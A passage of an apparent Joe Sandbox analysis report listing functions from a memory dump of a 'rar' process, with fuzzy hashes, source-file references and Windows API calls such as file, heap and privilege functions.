                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf3431c2f8b5c05d861a21d8e67f661f4fc02fcce2a835ad0cc1140c53210456
                                                              • Instruction ID: 6daeaa2b04beca659c76460042dddc9b6066fe0ccf24d67566f2f1a6928ee157
                                                              • Opcode Fuzzy Hash: cf3431c2f8b5c05d861a21d8e67f661f4fc02fcce2a835ad0cc1140c53210456
                                                              • Instruction Fuzzy Hash: 6CE1D921A0868A42FF20DE359C946FF2751EFC3B8AF044135DD4D8BAD6DE2CA445E716
                                                              Function 00007FF629AF72C4 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 481a6244aa78f3690721209afba1077f4be42ed0cb1ad071d5ce1956372566aa
                                                              • Instruction ID: 53b08ff41ac16b6623986e637a286a0fc252809b0c26b71657e8176419a582be
                                                              • Opcode Fuzzy Hash: 481a6244aa78f3690721209afba1077f4be42ed0cb1ad071d5ce1956372566aa
                                                              • Instruction Fuzzy Hash: 6A513673528BD195EB009F24A8441EE37A8F745F88F19423ADF884B79ADF396161D331
                                                              Function 00007FF629B5231C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                              • String ID:
                                                              • API String ID: 3947729631-0
                                                              • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                              • Instruction ID: 5ac7d6a3826672f8fcdd3c45c9857acad76f4f61f3da8b000f4b858aca2dab65
                                                              • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                              • Instruction Fuzzy Hash: 5E41C221E1A64B86FF689F25DC5027F2251AFD6742F004439DA0DC76A5DE3CE845E742
                                                              Function 00007FF629B04D1C Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CommandLine
                                                              • String ID:
                                                              • API String ID: 3253501508-0
                                                              • Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                              • Instruction ID: 9a13f926b2779837834b7ed333ef60e0a1b63e61849da195dfae7070af5024ca
                                                              • Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                              • Instruction Fuzzy Hash: E701C41160C64685EF10AF16AD001BF5661BFCBB96F480431EE4D47365EE3DD841A302
                                                              Function 00007FF629B54B8C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                              • Instruction ID: bcc0096163bc8773b495c3a99e423b07a7db97eacb0cbce1c4e2bfd91e21fe2d
                                                              • Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                              • Instruction Fuzzy Hash: F0012160A1C68B41FD649E66DE4027F31925FD7BD6F188630DE1DE62D6ED1CA4017103
                                                              Function 00007FF629B3A924 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CompareString
                                                              • String ID:
                                                              • API String ID: 1825529933-0
                                                              • Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                              • Instruction ID: 1e17feed84ea3615435274a6f6310ebcf2b07544d0662c99b90893721b18db7d
                                                              • Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                              • Instruction Fuzzy Hash: 0E01446170CA5685EE109F53A80406FA611ABDBFC1F5C4534EF8D9BB5ACE3DE0429709
                                                              Function 00007FF629B14554 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CloseFind
                                                              • String ID:
                                                              • API String ID: 1863332320-0
                                                              • Opcode ID: 37315976747a324bc4a89ca9f4e050d50d4baea4dbab69f22b0b8f40f318d585
                                                              • Instruction ID: e843a2e5fab6c21cf850c79b9812a6df46254ad5b22fc5fbb1ff433f2484b1b1
                                                              • Opcode Fuzzy Hash: 37315976747a324bc4a89ca9f4e050d50d4baea4dbab69f22b0b8f40f318d585
                                                              • Instruction Fuzzy Hash: 20F081219082C546DE159F7199013FE2751AB87BBAF084335DEBC4B2CBCE6C90849722
                                                              Function 00007FF629B54AB4 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                              • Instruction ID: efe0af6f1a3bb512e25e0fff0595a1a28e2eff838a1a648caa99a5cfa0d39cc4
                                                              • Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                              • Instruction Fuzzy Hash: 53F05415A1D28E40FD946E629C8027F22924FC67A2F080A34ED2DD53C1DE5CE4416116
                                                              Function 00007FF629B11930 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseFindNotification
                                                              • String ID:
                                                              • API String ID: 2591292051-0
                                                              • Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                              • Instruction ID: 21bcadc82329620248b65dc8f8f14db70ac4b862c7d81e7319570bb6f801b9a5
                                                              • Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                              • Instruction Fuzzy Hash: 39F0FF22A0824A44FF248F20E8483BE2250DB82BBAF685330D23C850D8CF28D893D352
                                                              Function 00007FF629B238A4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                              • Instruction ID: a8add1610653921f09f4fe96836c473ba67a97f320542a2d2860c503f9d1c6fe
                                                              • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                              • Instruction Fuzzy Hash: 13E09A50F1930E41ED5D2E621C5107E02419F9BB82E555439D91E8EB82AD2EA4557712
                                                              Function 00007FF629B5FA10 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                              • Instruction ID: f520c22a519da044a257c0007ebe333de436a1715a0124cf41c93b0e335f8dfe
                                                              • Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                              • Instruction Fuzzy Hash: 0ED01765E2AD0E82FF04DF41EC4433A2261AFE639BF514634C40C846508FAC2444BB02
                                                              Function 00007FF629B14538 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindClose.KERNELBASE(00000000,?,00000000,?,00007FF629B37A8C), ref: 00007FF629B14549
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CloseFind
                                                              • String ID:
                                                              • API String ID: 1863332320-0
                                                              • Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                              • Instruction ID: 23519664df3fbfc6256494e6c5935e06b90c8485179d0ebcc94eda11b0213bbd
                                                              • Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                              • Instruction Fuzzy Hash: 45C02B21E0548680CD045B2F8C5A13C2110BFC7B37FD41330C23D451E0CF1810EB4301

                                                              Non-executed Functions

                                                              Function 00007FF629B0D2C0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 313fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32 ref: 00007FF629B0D4A6
                                                              • CloseHandle.KERNEL32 ref: 00007FF629B0D4B9
                                                                • Part of subcall function 00007FF629B0EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF629B0EE47), ref: 00007FF629B0EF73
                                                                • Part of subcall function 00007FF629B0EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF629B0EE47), ref: 00007FF629B0EF84
                                                                • Part of subcall function 00007FF629B0EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF629B0EFA7
                                                                • Part of subcall function 00007FF629B0EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF629B0EFCA
                                                                • Part of subcall function 00007FF629B0EF50: GetLastError.KERNEL32 ref: 00007FF629B0EFD4
                                                                • Part of subcall function 00007FF629B0EF50: CloseHandle.KERNEL32 ref: 00007FF629B0EFE7
                                                              • CreateDirectoryW.KERNEL32 ref: 00007FF629B0D4C6
                                                              • CreateFileW.KERNEL32 ref: 00007FF629B0D64A
                                                              • DeviceIoControl.KERNEL32 ref: 00007FF629B0D68B
                                                              • CloseHandle.KERNEL32 ref: 00007FF629B0D69A
                                                              • GetLastError.KERNEL32 ref: 00007FF629B0D6AD
                                                              • RemoveDirectoryW.KERNEL32 ref: 00007FF629B0D6FA
                                                              • DeleteFileW.KERNEL32 ref: 00007FF629B0D705
                                                                • Part of subcall function 00007FF629B12310: FlushFileBuffers.KERNEL32 ref: 00007FF629B1233E
                                                                • Part of subcall function 00007FF629B12310: SetFileTime.KERNEL32 ref: 00007FF629B123DB
                                                                • Part of subcall function 00007FF629B11930: FindCloseChangeNotification.KERNELBASE ref: 00007FF629B11958
                                                                • Part of subcall function 00007FF629B139E0: SetFileAttributesW.KERNEL32(?,00007FF629B134EE,?,?,?,?,00000800,00000000,00000000,00007FF629B238CB,?,?,?,00007FF629B241EC), ref: 00007FF629B13A0F
                                                                • Part of subcall function 00007FF629B139E0: SetFileAttributesW.KERNEL32(?,00007FF629B134EE,?,?,?,?,00000800,00000000,00000000,00007FF629B238CB,?,?,?,00007FF629B241EC), ref: 00007FF629B13A3C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: File$Close$CreateHandle$AttributesDirectoryErrorLastProcessToken$AdjustBuffersChangeControlCurrentDeleteDeviceFindFlushLookupNotificationOpenPrivilegePrivilegesRemoveTimeValue
                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                              • API String ID: 2827264287-3508440684
                                                              • Opcode ID: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                              • Instruction ID: df852874d813e6872ed19f9520ed5e15e39564c9c1c9bcc98071937d93702583
                                                              • Opcode Fuzzy Hash: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                              • Instruction Fuzzy Hash: 54D1C026A0868A85EF209F21D9402FE73A0FFC6799F404131DA5D876D9DF3DE50AE702
                                                              Function 00007FF629B3AE50 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 281libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
